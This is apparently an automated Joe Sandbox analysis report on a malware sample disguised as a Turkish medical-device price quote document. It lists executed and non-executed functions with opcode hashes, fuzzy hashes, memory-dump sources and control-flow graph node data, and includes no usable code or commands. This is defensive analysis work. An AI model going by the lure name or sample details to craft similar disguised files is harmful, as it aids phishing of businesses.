                                                                                                  • Snapshot File: hcaresult_0_2_16cd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a03a4b1b6584710cfce8b91677f64fc7e5db51a1ad2fe153d7341c8beeee4b5b
                                                                                                  • Instruction ID: f8a348105e43b62770ab1ad658bab9ce5b45407ee14a10ce6a6ecebcb329ab38
                                                                                                  • Opcode Fuzzy Hash: a03a4b1b6584710cfce8b91677f64fc7e5db51a1ad2fe153d7341c8beeee4b5b
                                                                                                  • Instruction Fuzzy Hash: DDF06271404384AEEB208E1ACD88B76FF98EB81634F18C55EED084B397C3799844CAB1

                                                                                                  Non-executed Functions

                                                                                                  Function 076D5978 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: +&
                                                                                                  • API String ID: 0-986870808
                                                                                                  • Opcode ID: a9138fe97d6871602cbb75f0ce9b2a24d25f797fbb3b2c958d5177b5cbf35f0d
                                                                                                  • Instruction ID: 5e3637ba321abd3367c0c6d0ab3de492e67b7c87028e54961159aa130ae08bfe
                                                                                                  • Opcode Fuzzy Hash: a9138fe97d6871602cbb75f0ce9b2a24d25f797fbb3b2c958d5177b5cbf35f0d
                                                                                                  • Instruction Fuzzy Hash: D6E1E9B4E102198FDB14CFA9C590AAEBBF6FF89304F248169D816AB356D7349D41CF60
                                                                                                  Function 076D5968 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: +&
                                                                                                  • API String ID: 0-986870808
                                                                                                  • Opcode ID: 9aab0ef6747400bd0cfae98cbb2d4c7e0d937a3cb80f8f25682c52d4ca25e9cf
                                                                                                  • Instruction ID: 15a0448a5cdaee71acd3b0ffebe978e5962a1d70ec9758b6bfe1b0d021b5c73c
                                                                                                  • Opcode Fuzzy Hash: 9aab0ef6747400bd0cfae98cbb2d4c7e0d937a3cb80f8f25682c52d4ca25e9cf
                                                                                                  • Instruction Fuzzy Hash: 8F5108B4E102198FDB14CFA9C5809AEFBF6FF89304F248169D419AB656D7349D42CFA0
                                                                                                  Function 076DB4C8 Relevance: .4, Instructions: 355COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9df14bcfd93813212fa33ebc3e83238cd037769353bdc9aebcbe69ac32c1829f
                                                                                                  • Instruction ID: 1269e10b4d7b4a6b999d161c89e02603be84ec05157dea7ab9830bd5d5d46b54
                                                                                                  • Opcode Fuzzy Hash: 9df14bcfd93813212fa33ebc3e83238cd037769353bdc9aebcbe69ac32c1829f
                                                                                                  • Instruction Fuzzy Hash: 25D199B1B102068BEB25DB75C4507AEB7FAAF89600F14846DD14A9B394DB35ED02CB61
                                                                                                  Function 076D6328 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cbd522683730a3d7cbfd704c10a22afedf6fe816b401a2649ea460440194bf0
                                                                                                  • Instruction ID: 51497cb723cc01d474de51490cbd1273e1ca774084b473ebf222272795324111
                                                                                                  • Opcode Fuzzy Hash: 7cbd522683730a3d7cbfd704c10a22afedf6fe816b401a2649ea460440194bf0
                                                                                                  • Instruction Fuzzy Hash: BCE106B4E102198FDB14CFA8C584AAEBBF6FF89344F248169D815AB359D734AD41CF60
                                                                                                  Function 076D3E68 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4772d95dc3b2c19cd40bf22018d069891175d361f34c5f7591206c901df92e1f
                                                                                                  • Instruction ID: 6eddc1b57a9d78fccc9d258326f774bea759778e62e3a57c7965aa9d2d1967ad
                                                                                                  • Opcode Fuzzy Hash: 4772d95dc3b2c19cd40bf22018d069891175d361f34c5f7591206c901df92e1f
                                                                                                  • Instruction Fuzzy Hash: C8E1F7B4E102598FDB14CFA9C580AAEBBF6FF89304F248169D815AB355DB34AD41CF60
                                                                                                  Function 076D42A0 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc1d46d07243d7ed561e9690b48dddcb8f28c82dbbcb46a38b32f53380572a0a
                                                                                                  • Instruction ID: ca719f0fb6ed0601120e56a2371d7848885cdad2a24233fcb51f874b6b71a697
                                                                                                  • Opcode Fuzzy Hash: dc1d46d07243d7ed561e9690b48dddcb8f28c82dbbcb46a38b32f53380572a0a
                                                                                                  • Instruction Fuzzy Hash: F6E107B4E102598FDB14CFA9C580AAEBBF6FF89304F248169D805AB355DB34AD41CF60
                                                                                                  Function 076D5540 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1dd54bc4823d520b012f4ba65de84d9bf9cd62f779d5d65724feba17a00b9305
                                                                                                  • Instruction ID: 922f8ffa4ba654a675c095f75b398e575dd99280611842c9dd6523fe170852b2
                                                                                                  • Opcode Fuzzy Hash: 1dd54bc4823d520b012f4ba65de84d9bf9cd62f779d5d65724feba17a00b9305
                                                                                                  • Instruction Fuzzy Hash: 9DE1D9B4E102598FDB14CFA9C580AAEBBF6FF89304F248169D816AB356D7349D41CF60
                                                                                                  Function 0557DFB4 Relevance: .3, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dbdc024215cb97f12a06876f35b8594a6dbf5d643a92533fc2abf4519ba7d0fa
                                                                                                  • Instruction ID: 0787069add8dc7205bf6d29e4bc329b9a267a6fb920110b20702568522a80438
                                                                                                  • Opcode Fuzzy Hash: dbdc024215cb97f12a06876f35b8594a6dbf5d643a92533fc2abf4519ba7d0fa
                                                                                                  • Instruction Fuzzy Hash: 11A18132E10319CFCF05DFB4E84459EBBB6FF85300B1545AAE805AB261DB31E946CB90

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.9%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:16.7%
                                                                                                  Total number of Nodes:24
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 22456 29ae018 22457 29ae024 22456->22457 22464 556e258 22457->22464 22468 556e249 22457->22468 22458 29ae0ed 22472 556fc5f 22458->22472 22476 556fc68 22458->22476 22459 29ae61f 22465 556e27a 22464->22465 22467 556e344 22465->22467 22480 5569548 LdrInitializeThunk 22465->22480 22467->22458 22469 556e27a 22468->22469 22471 556e344 22469->22471 22481 5569548 LdrInitializeThunk 22469->22481 22471->22458 22473 556fc8a 22472->22473 22475 556fd3a 22473->22475 22482 5569548 LdrInitializeThunk 22473->22482 22475->22459 22477 556fc8a 22476->22477 22479 556fd3a 22477->22479 22483 5569548 LdrInitializeThunk 22477->22483 22479->22459 22480->22467 22481->22471 22482->22475 22483->22479 22484 556992c 22487 55697e3 22484->22487 22485 5569a69 LdrInitializeThunk 22486 5569a81 22485->22486 22487->22485

                                                                                                  Executed Functions

                                                                                                  Function 029A9DE0 Relevance: 6.1, Strings: 4, Instructions: 1121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (oq$4'q$4'q$4'q
                                                                                                  • API String ID: 0-2528434116
                                                                                                  • Opcode ID: de0d96b0d8d02f5668a5a6faf5c8948cfa3131f334b3f5a4b4dfaef01eb08437
                                                                                                  • Instruction ID: 3a533d19cc95b6f3c2f5460d990ceb29cc67d35b4237bade897597044c60d91a
                                                                                                  • Opcode Fuzzy Hash: de0d96b0d8d02f5668a5a6faf5c8948cfa3131f334b3f5a4b4dfaef01eb08437
                                                                                                  • Instruction Fuzzy Hash: AEA26C31A0030A9FCB15CF68C994AAEBBF6FF88314F158569E406DB265D735ED41CB90
                                                                                                  Function 029A7118 Relevance: 5.4, Strings: 4, Instructions: 352COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 478 29a7118-29a713b 479 29a713d-29a7143 478->479 480 29a7146-29a7166 478->480 479->480 483 29a7168 480->483 484 29a716d-29a7174 480->484 485 29a74fc-29a7505 483->485 486 29a7176-29a7181 484->486 487 29a750d-29a7519 486->487 488 29a7187-29a719a 486->488 493 29a751b-29a7521 487->493 494 29a74b5 487->494 491 29a719c-29a71aa 488->491 492 29a71b0-29a71cb 488->492 491->492 505 29a7484-29a748b 491->505 508 29a71ef-29a71f2 492->508 509 29a71cd-29a71d3 492->509 496 29a74bd-29a74c0 493->496 497 29a7523-29a7549 493->497 495 29a74b6-29a74b9 494->495 498 29a74ba 495->498 499 29a7508 495->499 501 29a74e2-29a74e4 496->501 502 29a74c2-29a74c4 496->502 516 29a754b-29a7550 497->516 517 29a7552-29a7556 497->517 504 29a74bb 498->504 499->487 501->499 511 29a74e6-29a74e9 501->511 506 29a74d3-29a74d9 502->506 507 29a74c6-29a74cb 502->507 504->496 505->485 514 29a748d-29a748f 505->514 506->487 515 29a74db-29a74e0 506->515 507->506 518 29a71f8-29a71fb 508->518 519 29a734c-29a7352 508->519 512 29a71dc-29a71df 509->512 513 29a71d5 509->513 526 29a74f0-29a74f3 511->526 521 29a7212-29a7218 512->521 522 29a71e1-29a71e4 512->522 513->512 513->519 520 29a743e-29a7441 513->520 513->521 523 29a749e-29a74a4 514->523 524 29a7491-29a7496 514->524 515->495 515->501 525 29a755c-29a755d 516->525 517->525 518->519 528 29a7201-29a7207 518->528 519->520 527 29a7358-29a735d 519->527 520->499 530 29a7447-29a744d 520->530 531 29a721a-29a721c 521->531 532 29a721e-29a7220 521->532 533 29a71ea 522->533 534 29a727e-29a7284 522->534 523->487 535 29a74a6-29a74ab 523->535 524->523 526->499 536 29a74f5-29a74fa 526->536 527->520 528->519 529 29a720d 528->529 529->520 538 29a744f-29a7457 530->538 539 29a7472-29a7476 530->539 540 29a722a-29a7233 531->540 532->540 533->520 534->520 537 29a728a-29a7290 534->537 535->526 541 29a74ad-29a74b2 535->541 536->485 536->514 543 29a7292-29a7294 537->543 544 29a7296-29a7298 537->544 538->487 545 29a745d-29a746c 538->545 539->505 548 29a7478-29a747e 539->548 546 29a7246-29a726e 540->546 547 29a7235-29a7240 540->547 541->499 542 29a74b4 541->542 542->504 549 29a72a2-29a72b9 543->549 544->549 545->492 545->539 560 29a7362-29a7398 546->560 561 29a7274-29a7279 546->561 547->520 547->546 548->486 548->505 554 29a72bb-29a72d4 549->554 555 29a72e4-29a730b 549->555 554->560 566 29a72da-29a72df 554->566 555->499 565 29a7311-29a7314 555->565 567 29a739a-29a739e 560->567 568 29a73a5-29a73ad 560->568 561->560 565->499 569 29a731a-29a7343 565->569 566->560 570 29a73bd-29a73c1 567->570 571 29a73a0-29a73a3 567->571 568->499 572 29a73b3-29a73b8 568->572 569->560 584 29a7345-29a734a 569->584 573 29a73c3-29a73c9 570->573 574 29a73e0-29a73e4 570->574 571->568 571->570 572->520 573->574 576 29a73cb-29a73d3 573->576 577 29a73ee-29a740a 574->577 578 29a73e6-29a73ec 574->578 576->499 579 29a73d9-29a73de 576->579 585 29a740d call 29a7700 577->585 586 29a740d call 29a76f1 577->586 578->577 581 29a7413-29a7417 578->581 579->520 581->520 582 29a7419-29a7435 581->582 582->520 584->560 585->581 586->581
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (oq$(oq$,q$,q
                                                                                                  • API String ID: 0-620556200
                                                                                                  • Opcode ID: 0fe45c7b2df41800b16f1c38fcd3002b72d500fa5d8f3acd9e16ecb1e523fdcd
                                                                                                  • Instruction ID: 17ef691826430c7ec9967ca6760167907a802b7d7d01659fe6a57ebae6555d87
                                                                                                  • Opcode Fuzzy Hash: 0fe45c7b2df41800b16f1c38fcd3002b72d500fa5d8f3acd9e16ecb1e523fdcd
                                                                                                  • Instruction Fuzzy Hash: 07E11C31A00219DFCB14CFA9D8A5AEDFBF6BF89304F558465E815AB265DB30E841CF90
                                                                                                  Function 029A69B0 Relevance: 3.1, Strings: 2, Instructions: 561COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1714 29a69b0-29a69e6 1715 29a69ec-29a69fa 1714->1715 1716 29a6fb1-29a700c call 29a7118 1714->1716 1719 29a6a28-29a6a39 1715->1719 1720 29a69fc-29a6a0d 1715->1720 1727 29a700e-29a7012 1716->1727 1728 29a705c-29a7060 1716->1728 1721 29a6aaa-29a6abe 1719->1721 1722 29a6a3b-29a6a3f 1719->1722 1720->1719 1729 29a6a0f-29a6a1b 1720->1729 1856 29a6ac1 call 29a69b0 1721->1856 1857 29a6ac1 call 29a69a0 1721->1857 1725 29a6a5a-29a6a63 1722->1725 1726 29a6a41-29a6a4d 1722->1726 1735 29a6a69-29a6a6c 1725->1735 1736 29a6d6c 1725->1736 1733 29a6ddb-29a6e26 1726->1733 1734 29a6a53-29a6a55 1726->1734 1737 29a7021-29a7028 1727->1737 1738 29a7014-29a7019 1727->1738 1731 29a7062-29a7071 1728->1731 1732 29a7077-29a708b 1728->1732 1739 29a6d71-29a6dd4 1729->1739 1740 29a6a21-29a6a23 1729->1740 1730 29a6ac7-29a6acd 1741 29a6acf-29a6ad1 1730->1741 1742 29a6ad6-29a6add 1730->1742 1743 29a709d-29a70a7 1731->1743 1744 29a7073-29a7075 1731->1744 1858 29a708d call 29aa0e8 1732->1858 1859 29a708d call 29a9dd0 1732->1859 1860 29a708d call 29a9de0 1732->1860 1811 29a6e2d-29a6eac 1733->1811 1745 29a6d62-29a6d69 1734->1745 1735->1736 1746 29a6a72-29a6a91 1735->1746 1736->1739 1747 29a70fe-29a7113 1737->1747 1748 29a702e-29a7035 1737->1748 1738->1737 1739->1733 1740->1745 1741->1745 1753 29a6bcb-29a6bdc 1742->1753 1754 29a6ae3-29a6afa 1742->1754 1750 29a70a9-29a70af 1743->1750 1751 29a70b1-29a70b5 1743->1751 1749 29a7093-29a709a 1744->1749 1746->1736 1773 29a6a97-29a6a9d 1746->1773 1748->1728 1755 29a7037-29a703b 1748->1755 1757 29a70bd-29a70f7 1750->1757 1751->1757 1759 29a70b7 1751->1759 1771 29a6bde-29a6beb 1753->1771 1772 29a6c06-29a6c0c 1753->1772 1754->1753 1767 29a6b00-29a6b0c 1754->1767 1761 29a704a-29a7051 1755->1761 1762 29a703d-29a7042 1755->1762 1757->1747 1759->1757 1761->1747 1763 29a7057-29a705a 1761->1763 1762->1761 1763->1749 1777 29a6b12-29a6b7e 1767->1777 1778 29a6bc4-29a6bc6 1767->1778 1776 29a6c27-29a6c2d 1771->1776 1788 29a6bed-29a6bf9 1771->1788 1775 29a6c0e-29a6c1a 1772->1775 1772->1776 1773->1716 1779 29a6aa3-29a6aa7 1773->1779 1782 29a6ec3-29a6f26 1775->1782 1783 29a6c20-29a6c22 1775->1783 1784 29a6d5f 1776->1784 1785 29a6c33-29a6c50 1776->1785 1813 29a6bac-29a6bc1 1777->1813 1814 29a6b80-29a6baa 1777->1814 1778->1745 1779->1721 1836 29a6f2d-29a6fac 1782->1836 1783->1745 1784->1745 1785->1736 1805 29a6c56-29a6c59 1785->1805 1793 29a6bff-29a6c01 1788->1793 1794 29a6eb1-29a6ebc 1788->1794 1793->1745 1794->1782 1805->1716 1809 29a6c5f-29a6c85 1805->1809 1809->1784 1817 29a6c8b-29a6c97 1809->1817 1813->1778 1814->1813 1820 29a6d5b-29a6d5d 1817->1820 1821 29a6c9d-29a6d15 1817->1821 1820->1745 1839 29a6d43-29a6d58 1821->1839 1840 29a6d17-29a6d41 1821->1840 1839->1820 1840->1839 1856->1730 1857->1730 1858->1749 1859->1749 1860->1749
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (oq$Hq
                                                                                                  • API String ID: 0-2917151738
                                                                                                  • Opcode ID: b7265e8a59be56870e0dd3d8af0b093c2029cf18bc634dda17dc77ce12e1e9c1
                                                                                                  • Instruction ID: cccd818ecedd234ad33339cf33da0a55f2643f87935cd5f51599f041b1a80b48
                                                                                                  • Opcode Fuzzy Hash: b7265e8a59be56870e0dd3d8af0b093c2029cf18bc634dda17dc77ce12e1e9c1
                                                                                                  • Instruction Fuzzy Hash: 90227F70A002199FDB14DF69C855BAEBBBAFF88340F188469E805DB395DF349D42CB90
                                                                                                  Function 029AC148 Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2123 29ac148-29ac158 2124 29ac15a-29ac172 2123->2124 2125 29ac184 2123->2125 2129 29ac17b-29ac17e 2124->2129 2130 29ac174-29ac179 2124->2130 2126 29ac186-29ac18a 2125->2126 2131 29ac18b-29ac199 2129->2131 2132 29ac180-29ac182 2129->2132 2130->2126 2134 29ac19b 2131->2134 2135 29ac19d 2131->2135 2132->2124 2132->2125 2134->2135 2136 29ac19f-29ac1a0 2135->2136 2137 29ac1a1 2135->2137 2136->2137 2138 29ac1a3-29ac1a4 2137->2138 2139 29ac1a5-29ac1c8 2137->2139 2138->2139 2140 29ac1ca 2139->2140 2141 29ac1cf-29ac2ac call 29a41a0 call 29a3cc0 2139->2141 2140->2141 2151 29ac2ae 2141->2151 2152 29ac2b3-29ac2d4 call 29a5658 2141->2152 2151->2152 2154 29ac2d9-29ac2e4 2152->2154 2155 29ac2eb-29ac2ef 2154->2155 2156 29ac2e6 2154->2156 2157 29ac2f1-29ac2f2 2155->2157 2158 29ac2f4-29ac2fb 2155->2158 2156->2155 2159 29ac313-29ac357 2157->2159 2160 29ac2fd 2158->2160 2161 29ac302-29ac310 2158->2161 2165 29ac3bd-29ac3d4 2159->2165 2160->2161 2161->2159 2167 29ac359-29ac36f 2165->2167 2168 29ac3d6-29ac3fb 2165->2168 2172 29ac399 2167->2172 2173 29ac371-29ac37d 2167->2173 2174 29ac3fd-29ac412 2168->2174 2175 29ac413 2168->2175 2178 29ac39f-29ac3bc 2172->2178 2176 29ac37f-29ac385 2173->2176 2177 29ac387-29ac38d 2173->2177 2174->2175 2179 29ac397 2176->2179 2177->2179 2178->2165 2179->2178
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: f558256369b6861ba1f31daff1064561782fed7624f5d1cef8db889b8ae2b01a
                                                                                                  • Instruction ID: 01fc70afa5a7d91fd887e76c919374307ba37600357eb07a96a9fe3fdefc1a3c
                                                                                                  • Opcode Fuzzy Hash: f558256369b6861ba1f31daff1064561782fed7624f5d1cef8db889b8ae2b01a
                                                                                                  • Instruction Fuzzy Hash: 0DA1E674E00318DFEB14DFA9D894A9DBBF6BF89310F14806AE409AB365DB709841CF55
                                                                                                  Function 029A5362 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2183 29a5362-29a5364 2184 29a5366-29a53a0 2183->2184 2185 29a53c4-29a5484 call 29a41a0 call 29a3cc0 2183->2185 2186 29a53a2 2184->2186 2187 29a53a7-29a53c2 2184->2187 2197 29a548b-29a54a9 2185->2197 2198 29a5486 2185->2198 2186->2187 2187->2185 2228 29a54ac call 29a5658 2197->2228 2229 29a54ac call 29a5649 2197->2229 2198->2197 2199 29a54b2-29a54bd 2200 29a54bf 2199->2200 2201 29a54c4-29a54c8 2199->2201 2200->2201 2202 29a54ca-29a54cb 2201->2202 2203 29a54cd-29a54d4 2201->2203 2204 29a54ec-29a5530 2202->2204 2205 29a54db-29a54e9 2203->2205 2206 29a54d6 2203->2206 2210 29a5596-29a55ad 2204->2210 2205->2204 2206->2205 2212 29a55af-29a55d4 2210->2212 2213 29a5532-29a5548 2210->2213 2220 29a55ec 2212->2220 2221 29a55d6-29a55eb 2212->2221 2217 29a554a-29a5556 2213->2217 2218 29a5572 2213->2218 2222 29a5558-29a555e 2217->2222 2223 29a5560-29a5566 2217->2223 2219 29a5578-29a5595 2218->2219 2219->2210 2221->2220 2224 29a5570 2222->2224 2223->2224 2224->2219 2228->2199 2229->2199
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: aa88e913ff46920c8be162df1a7277b97a6253ec3d67f2c8919f2e43488218b6
                                                                                                  • Instruction ID: cb0ed982b551c8765ff0dee3e74eecab42b27a6f4d70d9937893fe06832f3d9e
                                                                                                  • Opcode Fuzzy Hash: aa88e913ff46920c8be162df1a7277b97a6253ec3d67f2c8919f2e43488218b6
                                                                                                  • Instruction Fuzzy Hash: 1891CF74E00318DFEB14DFAAD994A9DBBF2BF88300F158069E809AB365DB309845CF51
                                                                                                  Function 029AC468 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2230 29ac468-29ac498 2231 29ac49a 2230->2231 2232 29ac49f-29ac57c call 29a41a0 call 29a3cc0 2230->2232 2231->2232 2242 29ac57e 2232->2242 2243 29ac583-29ac5a4 call 29a5658 2232->2243 2242->2243 2245 29ac5a9-29ac5b4 2243->2245 2246 29ac5bb-29ac5bf 2245->2246 2247 29ac5b6 2245->2247 2248 29ac5c1-29ac5c2 2246->2248 2249 29ac5c4-29ac5cb 2246->2249 2247->2246 2250 29ac5e3-29ac627 2248->2250 2251 29ac5cd 2249->2251 2252 29ac5d2-29ac5e0 2249->2252 2256 29ac68d-29ac6a4 2250->2256 2251->2252 2252->2250 2258 29ac629-29ac63f 2256->2258 2259 29ac6a6-29ac6cb 2256->2259 2263 29ac669 2258->2263 2264 29ac641-29ac64d 2258->2264 2265 29ac6cd-29ac6e2 2259->2265 2266 29ac6e3 2259->2266 2269 29ac66f-29ac68c 2263->2269 2267 29ac64f-29ac655 2264->2267 2268 29ac657-29ac65d 2264->2268 2265->2266 2270 29ac667 2267->2270 2268->2270 2269->2256 2270->2269
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHq$PHq
                                                                                                  • API String ID: 0-1274609152
                                                                                                  • Opcode ID: 320b148009d2d7022c226dcd6d459d308827fa7a5c287ce8012cae9d7a1ce017
                                                                                                  • Instruction ID: a4dad7b560b5fc887df703ca4c0024456f8fd8faefb4a37c921fbff940464c8b
                                                                                                  • Opcode Fuzzy Hash: 320b148009d2d7022c226dcd6d459d308827fa7a5c287ce8012cae9d7a1ce017
                                                                                                  • Instruction Fuzzy Hash: 4281B274E00218DFEB14DFAAD994B9DBBF2BF88300F14906AE419AB365DB709941CF51
                                                                                                  Function 029ACA08 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
